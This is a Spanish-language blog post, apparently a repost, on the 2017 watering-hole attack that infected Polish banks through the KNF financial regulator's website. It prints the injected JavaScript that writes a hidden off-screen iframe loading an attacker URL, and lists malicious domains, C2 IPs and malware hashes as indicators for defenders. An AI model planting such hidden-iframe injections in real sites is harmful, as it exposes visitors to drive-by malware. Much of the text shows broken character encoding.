Saturday, September 9, 2017

Hackean varios bancos en Polonia infectándoles a través de un Organismo Financiero Gubernamental

Hackean varios bancos en Polonia infectándoles a través de un Organismo Financiero Gubernamental



Esta semana ha saltado a la primera plana internacional el que ya est� considerado como el mayor incidente de Ciberseguridad en la historia de Polonia: varios bancos del pa�s han sido v�ctimas de un Malware y la fuente de la infecci�n fue la Autoridad de Supervisi�n Financiera de Polonia (KNF), organismo oficial encargado precisamente de garantizar la seguridad en el sector financiero.

Por el momento se desconoce el n�mero total de bancos afectados aunque se teoriza sobre unas 20 entidades distintas y se ha reportado la infecci�n tanto de estaciones de trabajo como de servidores en varias instituciones bancarias de Polonia. Solamente se ha confirmado la exfiltraci�n de datos e informaci�n confidencial y se ha descartado el robo de dinero o manipulaci�n de cuentas bancarias, aunque el tr�fico detectado conten�a gran cantidad de datos cifrados por lo que es imposible discernir de momento el contenido.

La informaci�n es a d�a de hoy escasa y difusa, ya que est� siendo controlada con cuentagotas para mitigar el posible p�nico que pudiera desencadenar entre usuarios y clientes. 

El detonante de la investigaci�n fue la detecci�n de tr�fico inusual a localizaciones ex�ticas y el hallazgo de ciertos ejecutables cifrados en servidores de varias entidades, quienes al cotejar los resultados de sus an�lisis y las IOC dieron la voz de alarma.

V�a de Entrada

Las primeras investigaciones se�alan que el punto de partida de la infecci�n fue el servidor web del regulador financiero polaco antes mencionado, KNF: www.knf.gov.pl

Dicha web ha permanecido ca�da durante los �ltimos d�as y hoy durante toda la jornada �nicamente ha sido accesible desde Polonia y ha estado bloqueando por geolocalizaci�n toda conexi�n externa.

Mensaje de error en la web del KNF
Bloqueo por geolocalizaci�n de la web del KNF: conexi�n desde fuera y dentro de Polonia
El art�culo de BadCyber escrito por varios analistas que han tenido acceso privilegiado a la investigaci�n relata que el c�digo de una librer�a Javascript de dicho servidor habr�a sido alterado para cargar un fichero Javascript o JSP externo alojado en un servidor remoto, aunque se desconoce c�mo se habr�a logrado en primera instancia dicha modificaci�n inicial.

El c�digo malicioso inyectado estaba localizado en el fichero:
hxxp://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11
Y consist�a en las siguiente l�neas:
document.write("<div id=efHpTk width=0px height=0px><iframe 
name=forma src=hxxps://sap.misapor.ch/vishop/view.jsp?pagenum=1
width=145px height=146px style=left:-2144px;position:absolute;top:0px;
></iframe></div>");

Dicho fragmento de Javascript var�a de unas versiones a otras en cuanto a la URL y el fichero que carga. A continuaci�n una lista de todos posibles dominios maliciosos encontrados y relacionados con el ataque:
  • sap.misapor.ch 
  • www.eye-watch.in
  • ocmlaptops.co.uk
  • ournepal.com 
  • impacthomes-my.sharepoint.com
  • pharmacareaus-my.sharepoint.com
  • cpsnortherngroup.com 
  • Polakwchinach.pl
Se desconoce el contenido de dichos ficheros Javascript/JSP ya que los recursos parecen no estar disponibles y los servidores devuelven un HTTP 404 o un HTTP 202 con un archivo sin contenido. 
Se cree firmemente que descargaba un fichero en el equipo de la v�ctima el cual al ser ejecutado realizaba conexiones con varios servidores controlados por los atacantes permiti�ndoles funcionalidades como tomar el control del equipo y propagarse por la red interna.

Servidor C&C

En los logs analizados de equipos infectados se han detectado conexiones a dos IPs distintas:
  • 125.214.195.17
  • 196.29.166.218
Detr�s de una de esas IPs parece haber un servidor en Sud�n bastante abierto:




Fuente de las im�genes: https://twitter.com/v0id_hunter/status/828693925057675265

Malware

Aun no est� clara la autor�a de estos ataques, pero los an�lisis forenses pertinentes dejan entrever que el problema se remonta a mediados de 2016, lo que significa que los bancos han sido v�ctimas del espionaje durante m�s de 6 meses.

El malware utilizado en Polonia usa packers comerciales y m�ltiple ofuscadores, recurre al cifrado de ficheros y tr�fico, y en el momento de los an�lisis ning�n Antivirus era capaz de detectarlo. El payload final ten�a las funcionalidades de un RAT com�n.

Ciertos analistas destacan como posible candidato a relacionar con dicho malware a una APT bautizada como "Bluenoroff" que fue detectada en 2016 y cuya incidencia se ha disparado en los �ltimos meses. 
El siguiente informe de Telef�nica del pasado noviembre habla sobre dicha APT bas�ndose en an�lisis realizados por Karspersky sobre una muestra obtenida de un ataque al Banco de Indonesia. Seg�n el citado documento, "Bluenoroff" fue el malware utilizado en los ataques contra el sistema SWIFT en Bangladesh, Indonesia, India y otros pa�ses del sudeste asi�tico, y presenta similitudes con otro usado previamente en ataques contra bancos en Vietnam.

A la espera de nuevos avances en las investigaciones, de momento s�lo se han compartido los hashes de algunas de las muestras analizadas:

MD5
C1364BBF63B3617B25B58209E4529D8C
85D316590EDFB4212049C4490DB08C4B
1BFBC0C9E0D9CEB5C3F4F6CED6BCFEAE


SHA1 
496207DB444203A6A9C02A32AFF28D563999736C
4F0D7A33D23D53C0EB8B34D102CDD660FC5323A2
BEDCEAFA2109139C793CB158CEC9FA48F980FF2B
SHA256 
FC8607C155617E09D540C5030EABAD9A9512F656F16B38682FD50B2007583E9B
D4616F9706403A0D5A2F9A8726230A4693E4C95C58DF5C753CCC684F1D3542E2
CC6A731E9DAFF84BAE4214603E1C3BAD8D6735B0CBB2A0EC1635B36E6A38CB3A


Fuentes:
https://zaufanatrzeciastrona.pl/post/wlamania-do-kilku-bankow-skutkiem-powaznego-ataku-na-polski-sektor-finansowy/
https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
https://twitter.com/v0id_hunter/status/828693925057675265
http://thehackernews.com/2017/02/bank-hacking-malware.html
https://www.elevenpaths.com/wp-content/uploads/2016/11/Financial_Threats_Q3-2016_EN.pdf


download file now